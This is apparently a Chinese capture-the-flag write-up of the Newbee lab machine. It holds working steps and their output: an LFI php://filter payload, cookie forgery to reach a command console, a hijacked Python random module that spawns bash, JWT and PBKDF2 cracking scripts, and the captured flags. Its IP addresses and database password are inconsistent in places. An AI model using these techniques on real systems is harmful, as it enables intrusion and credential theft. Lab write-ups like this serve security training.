信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.132  00:0c:29:d3:79:74       VMware, Inc.
192.168.60.254  00:50:56:f0:6f:4b       VMware, Inc.
^C
❯ export ip=192.168.60.132
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.132:22
Open 192.168.60.132:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 15:59 CST
Initiating ARP Ping Scan at 15:59
Scanning 192.168.60.132 [1 port]
Completed ARP Ping Scan at 15:59, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 192.168.60.132 [2 ports]
Discovered open port 80/tcp on 192.168.60.132
Discovered open port 22/tcp on 192.168.60.132
Completed SYN Stealth Scan at 15:59, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.132
Host is up, received arp-response (0.0028s latency).
Scanned at 2025-04-01 15:59:18 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 00:0C:29:D3:79:74 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

❯ gobuster dir -u  "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.235
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 18852]
/contact.php          (Status: 200) [Size: 8853]
/blog.php             (Status: 200) [Size: 9782]
/about.php            (Status: 200) [Size: 10036]
/products.php         (Status: 200) [Size: 12163]
/terms.php            (Status: 200) [Size: 6670]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.235/assets/]
/testimonials.php     (Status: 200) [Size: 7907]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.235/javascript/]
/checkout.php         (Status: 200) [Size: 13307]
/secret.php           (Status: 200) [Size: 2187]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下，发现是个购物平台

LFI文件包含

curl一下index.php

发现存在注释

❯ curl $ip
<!DOCTYPE html>
<html lang="en">

  <head>
………………省略…………
<!--Wrong paramter to GET-->%
GET参数错误

尝试模糊测试一下，可能存在LFI文件包含漏洞

发现参数hack

❯ wfuzz -c -u "http://192.168.60.235/index.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 1267
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.235/index.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001687:   200        376 L    1270 W     18863 Ch    "hack"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 46.49476
Processed Requests: 30493
Filtered Requests: 30492
Requests/sec.: 655.8373

利用hack参数访问

得到一个新的注释

1
2
3

❯ curl "$ip/index.php?hack=/etc/passwd"
<!-- include failed try another file -->%
包括失败，请尝试另一个文件

同时在/secret.php中存在命令执行的界面

提示缺少管理员权限

尝试利用上面的LFI读取一下

利用php://filter/convert.base64-encode/resource=过滤器来读一下源码

1
2
3

❯ curl "$ip/index.php?hack=php://filter/convert.base64-encode/resource=secret.php"
</html>
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJ6aC1DTiI+DQo8aGVhZD4NCiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT7lkb3ku6TooYzmjqfliLblj7A8L3RpdGxlPg0KICAgIDxzdHlsZT4NCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjMWUxZTFlOw0KICAgICAgICAgICAgZm9udC1mYW1pbHk6IENvbnNvbGFzLCBtb25vc3BhY2U7DQogICAgICAgICAgICBjb2xvcjogI2ZmZjsNCiAgICAgICAgICAgIG1hcmdpbjogMDsNCiAgICAgICAgICAgIHBhZGRpbmc6IDA7DQogICAgICAgIH0NCg0KICAgICAgICAuY29uc29sZSB7DQogICAgICAgICAgICB3aWR0aDogODAlOw0KICAgICAgICAgICAgbWFyZ2luOiA1MHB4IGF1dG87DQogICAgICAgICAgICBwYWRkaW5nOiAyMHB4Ow0KICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCiAgICAgICAgICAgIGJvcmRlci1yYWRpdXM6IDhweDsNCiAgICAgICAgICAgIGJveC1zaGFkb3c6IDAgNHB4IDEwcHggcmdiYSgwLCAwLCAwLCAwLjUpOw0KICAgICAgICAgICAgaGVpZ2h0OiA0MDBweDsNCiAgICAgICAgICAgIG92ZXJmbG93LXk6IGF1dG87DQogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7DQogICAgICAgIH0NCg0KICAgICAgICAub3V0cHV0IHsNCiAgICAgICAgICAgIHdoaXRlLXNwYWNlOiBwcmUtd3JhcDsNCiAgICAgICAgICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIHsNCiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7DQogICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgICAgICB9DQoNCiAgICAgICAgLmlucHV0LWNvbnRhaW5lciAucHJvbXB0IHsNCiAgICAgICAgICAgIGNvbG9yOiAjMDBmZjAwOw0KICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiA1cHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0IHsNCiAgICAgICAgICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50Ow0KICAgICAgICAgICAgYm9yZGVyOiBub25lOw0KICAgICAgICAgICAgY29sb3I6ICNmZmY7DQogICAgICAgICAgICB3aWR0aDogMTAwJTsNCiAgICAgICAgICAgIHBhZGRpbmc6IDVweDsNCiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTZweDsNCiAgICAgICAgICAgIG91dGxpbmU6IG5vbmU7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OmZvY3VzIHsNCiAgICAgICAgICAgIGJvcmRlcjogMXB4IHNvbGlkICMwMGZmMDA7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OjpwbGFjZWhvbGRlciB7DQogICAgICAgICAgICBjb2xvcjogIzg4ODsNCiAgICAgICAgfQ0KDQogICAgICAgIC5jb25zb2xlLWZvb3RlciB7DQogICAgICAgICAgICBwYWRkaW5nLXRvcDogMTBweDsNCiAgICAgICAgICAgIGNvbG9yOiAjODg4Ow0KICAgICAgICAgICAgZm9udC1zaXplOiAxMnB4Ow0KICAgICAgICAgICAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgICAgICB9DQogICAgPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KDQo8ZGl2IGNsYXNzPSJjb25zb2xlIj4NCiAgICA8ZGl2IGNsYXNzPSJvdXRwdXQiIGlkPSJvdXRwdXQiPg0KICAgICAgICA8P3BocA0KDQogICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnQXJlWW91QWRtaW4nXSkgJiYgJF9DT09LSUVbJ0FyZVlvdUFkbWluJ10gPT09ICdZZXMnKSB7DQoNCiAgICAgICAgICAgIGlmIChpc3NldCgkX0dFVFsnY29tbWFuZCddKSkgew0KICAgICAgICAgICAgICAgICRjb21tYW5kID0gJF9HRVRbJ2NvbW1hbmQnXTsNCiAgICAgICAgICAgICAgICAkb3V0cHV0ID0gc2hlbGxfZXhlYygkY29tbWFuZCk7DQogICAgICAgICAgICAgICAgZWNobyAnPGRpdj5cPiAnIC4gaHRtbHNwZWNpYWxjaGFycygkY29tbWFuZCkgLiAnPC9kaXY+JzsNCiAgICAgICAgICAgICAgICBlY2hvICc8ZGl2PicgLiBubDJicihodG1sc3BlY2lhbGNoYXJzKCRvdXRwdXQpKSAuICc8L2Rpdj4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZWNobyAnPGRpdj5ObyBwZXJtaXNzaW9uIHRvIGV4ZWN1dGUgY29tbWFuZHMsIGxhY2tpbmcgYWRtaW4gcGVybWlzc2lvbi48L2Rpdj4nOw0KICAgICAgICB9DQogICAgICAgID8+DQogICAgPC9kaXY+DQoNCiAgICA8ZGl2IGNsYXNzPSJpbnB1dC1jb250YWluZXIiPg0KICAgICAgICA8c3BhbiBjbGFzcz0icHJvbXB0Ij5cPjwvc3Bhbj4NCiAgICAgICAgPGZvcm0gbWV0aG9kPSJnZXQiPg0KICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIGlkPSJpbnB1dCIgcGxhY2Vob2xkZXI9ImNvbW1hbmQuLi4iIGF1dG9jb21wbGV0ZT0ib2ZmIj4NCiAgICAgICAgPC9mb3JtPg0KICAgIDwvZGl2Pg0KPC9kaXY+DQoNCjxzY3JpcHQ+DQogICAgY29uc3QgaW5wdXRGaWVsZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbnB1dCIpOw0KDQogICAgaW5wdXRGaWVsZC5mb2N1cygpOw0KPC9zY3JpcHQ+DQoNCjwvYm9keT4NCjwvaHRtbD4NCg==<!-- include failed try another file -->%

Cookie伪造

base64解码一下

只看一下php部分的关键参数

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>å½ä»¤è¡æ§å¶å°</title>
<body>

<div class="console">
    <div class="output" id="output">
        <?php

        if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

            if (isset($_GET['command'])) {
                $command = $_GET['command'];
                $output = shell_exec($command);
                echo '<div>\> ' . htmlspecialchars($command) . '</div>';
                echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
            }
        } else {
            echo '<div>No permission to execute commands, lacking admin permission.</div>';
        }
        ?>
    </div>

    <div class="input-container">
        <span class="prompt">\></span>
        <form method="get">
            <input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
        </form>
    </div>
</div>

<script>
    const inputField = document.getElementById("input");

    inputField.focus();
</script>

</body>
</html>

设置Cookie的值为AreYouAdmin=Yes即可

执行反弹shell即可

用户提权

监听端口

得到用户www-data

❯ pwncat-cs -lp 4444
[16:03:23] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[16:03:25] received connection from 192.168.60.132:42388                                                                                    bind.py:84
[16:03:40] 192.168.60.132:42388: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Name or service not known
Matching Defaults entries for www-data on Newbee:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, targetpw, use_pty

User www-data may run the following commands on Newbee:
    (debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py

通过查看index.php

发现代码中写死了只能看secret.php

所以我无论如何绕过路径都无法读取文件

<?php
ini_set('display_errors', 'Off');
error_reporting(0);
if (isset($_GET['hack'])) {
    $file = $_GET['hack'];
    while (rawurldecode($file) !== $file) {
        $file = rawurldecode($file);
    }


    while (strpos($file, '../') !== false) {
        $file = str_replace('../', '', $file);
    }
    if(strpos($file,'secret'))
    {
            include $file;
    }

    echo "<!-- include failed try another file -->";

}
else {
    echo "<!--Wrong paramter to GET-->";
}
?>

Python库劫持

用户www-data拥有sudo权限

我们看一下vuln.py调用哪些库

(remote) www-data@Newbee:/var/www/html$ cat vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):

    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():

    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():

    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # 故意睡眠 2 秒
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():

    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

直接写个新的库文件，python执行会优先调用当前目录下的文件

正常提权即可

debian@debian:~$ vi random.py
import os
os.system("/bin/bash")
(remote) www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
sudo: unable to resolve host Newbee: Name or service not known
debian@Newbee:/var/www/html$
debian@Newbee:/var/www/html$ cd ~
debian@Newbee:~$ cat user.txt
ed2b1f468c5f915f3f1cf75d7068baae

Root提权

同时发现家目录中存在note提示

而且本地端口开放3306 5000

(remote) www-data@debian:/var/www/html$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
该死，我忘记了我的数据库密码。听说Debian目前正在建立一个留言板，也许他可以帮助我。
(remote) www-data@debian:/tmp$ ss -luntp
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               128                          127.0.0.1:5000                        0.0.0.0:*
tcp           LISTEN          0               511                                  *:80                                *:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*

尝试利用socat将5000端口转发出来

(remote) www-data@debian:/tmp$ ./socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000&                                                                    
[2] 27843
--------------------------------------------------------------------
❯ nmap -p 5001 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 16:34 CST
Nmap scan report for 192.168.60.235
Host is up (0.00034s latency).

PORT     STATE SERVICE
5001/tcp open  commplex-link
MAC Address: 00:0C:29:DE:6F:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

JWT伪造

浏览器访问一下，果然存在留言板

不过需要登录才能查看具体内容

而且的源代码中的注释给了提示，用户的secret key非常简单

当你尝试登录的时候，会发现除了admin这个用户之外，其他什么用户都可以随意登录

所以确定了admin用户名是存在的

我随意登录一下aaa用户

burpsuite抓包看一下，登录成功后会给一个Cookie

解码一下，发现是JWT

那么我们可以进行伪造

尝试修改username

但问题是我们并不知道secret key

没法成功伪造，修改了cookie后刷新login就掉了

所以需要进行JWT爆破

Brute Force - CheatSheet - HackTricks

Sjord/jwtcrack: Crack the shared secret of a HS256-signed JWT

brendan-rius/c-jwt-cracker：用 C 语言编写的 JWT 蛮力破解程序

如果用的是python那个脚本需要修改一下，打开的字典指定编码

with open(dictionary, 'r', encoding='utf-8', errors='ignore') as fp:

❯ git clone https://github.com/Sjord/jwtcrack.git
Cloning into 'jwtcrack'...
remote: Enumerating objects: 68, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 68 (delta 1), reused 5 (delta 0), pack-reused 60 (from 1)
Receiving objects: 100% (68/68), 24.53 KiB | 358.00 KiB/s, done.
Resolving deltas: 100% (22/22), done.
❯ cd jwtcrack
❯ grep "noob" /usr/share/wordlists/rockyou.txt>aa.txt
❯ python crackjwt.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSIsImV4cCI6MTc0MTQyODM4N30.HgOioenDyUlk1GcYkKR3h3K0bYDn6p_pnhENbsL3W5E aa.txt
Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSIsImV4cCI6MTc0MTQyODM4N30.HgOioenDyUlk1GcYkKR3h3K0bYDn6p_pnhENbsL3W5E
413it [00:00, 93817.57it/s]
Found secret key: noob

得到密码noob，再次构造JWT

利用Cookie Editor修改一下Cookie

Hash 爆破

得到mysql的用户凭证root:TheStrongestPasswordHYHcreated

mysql服务连接一下

(remote) www-data@debian:/var/www/html/flask$ mysql -uroot -pThePasswordYouNeverCracked
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 27710
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| user               |
+--------------------+
5 rows in set (0.006 sec)

MariaDB [(none)]> use user
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd                                                                                                                   | salt                             | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
|  1 | debian   | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60   |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.002 sec)

MariaDB [user]>

经过靶机作者提示，就是爆破hash

不过利用hashcat会比较慢，下面贴一下作者的脚本

import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50500, dklen=60):
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )
    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50500, dklen=60):
    target_hash_bytes = binascii.unhexlify(target_hash)

    with open(dictionary_file, 'r', encoding='utf-8') as file:
        count = 0
        for line in file:
            password = line.strip()
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            count += 1
            print(f"正在检查密码 {count}: {password}")
            if hash_value == target_hash_bytes:
                print(f"\nFound password: {password}")
                return password
        print("Password not found.")
        return None

salt = binascii.unhexlify('8bf3e3452b78544f8bee9400d6936d34')
target_hash = '2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)

跑一下，得到密码1qaz2wsx

❯ python exp.py

正在检查密码 1420: 1qaz2wsx
z
Found password: 1qaz2wsx

这里顺便用hashcat跑一遍验证一下

[HackMyVM-Listen1 1-Walkthrough | Pepster’Blog](https://pepster.me/HackMyVM-Listen 1 1/#pbkdf2爆破)

需要将salt 和 digest从十六进制转为二进制后再base64编码后构造成hash即可

❯ echo -n "8bf3e3452b78544f8bee9400d6936d34" |xxd -r -p |base64
i/PjRSt4VE+L7pQA1pNtNA==
❯ echo -n "2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0" |xxd -r -p |base64
LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSG
XEHA
❯ echo -n "sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA" >hash

跑的还挺快的

❯ hashcat -a 0 -m 10900 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12600KF, 2917/5898 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT...SGXEHA
Time.Started.....: Tue Apr  1 16:32:52 2025 (2 secs)
Time.Estimated...: Tue Apr  1 16:32:54 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1048 H/s (9.48ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:50432-50499
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> lovers1

Started: Tue Apr  1 16:32:52 2025
Stopped: Tue Apr  1 16:32:56 2025

POC利用

在用户家目录还存在.secret的隐藏文件夹

我们将文件下载到本地

debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls -al
total 16
drwxr-xr-x 2 root   root   4096 Mar 25 08:02 .
drwx------ 5 debian debian 4096 Apr  1 03:46 ..
-rw-r--r-- 1 root   root     48 Mar 25 07:56 hint.txt
-rw-r--r-- 1 root   root    758 Mar 25 08:00 password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!
debian@Newbee:~/.secret$ echo -n  "1qaz2wsx"|md5sum
1c63129ae9db9c60c3e8aa94d3e00495  -
debian@Newbee:~/.secret$
(local) pwncat$ download password.zip
password.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 758/758 bytes • ? • 0:00:00
[16:52:14] downloaded 758.00B in 0.15 seconds                                                                                           download.py:71
(local) pwncat$

(remote) debian@Newbee:/home/debian/.secret$

打开图片，得到一张疑似打了马赛克的文字

spipm/Depixelization_poc: Depix is a PoC for a technique to recover plaintext from pixelized screenshots.

通过关键字搜索了解到Github中有个还原文字马赛克的项目

不过你如果需要通过此图片还原文字，还需要有一个De Bruijn 序列

由于还需要安装python库依赖，太麻烦了

但是你仔细观察可以看到这个图片和项目中的示例图片好像是一模一样的

因此密码就是hellofromtheotherside

(remote) debian@Newbee:/home/debian/.secret$ su root
Password:
root@Newbee:/home/debian/.secret# cd ~
root@Newbee:~# cat root.txt
c18b3eff03996f3a203f63733be03d15
root@Newbee:~#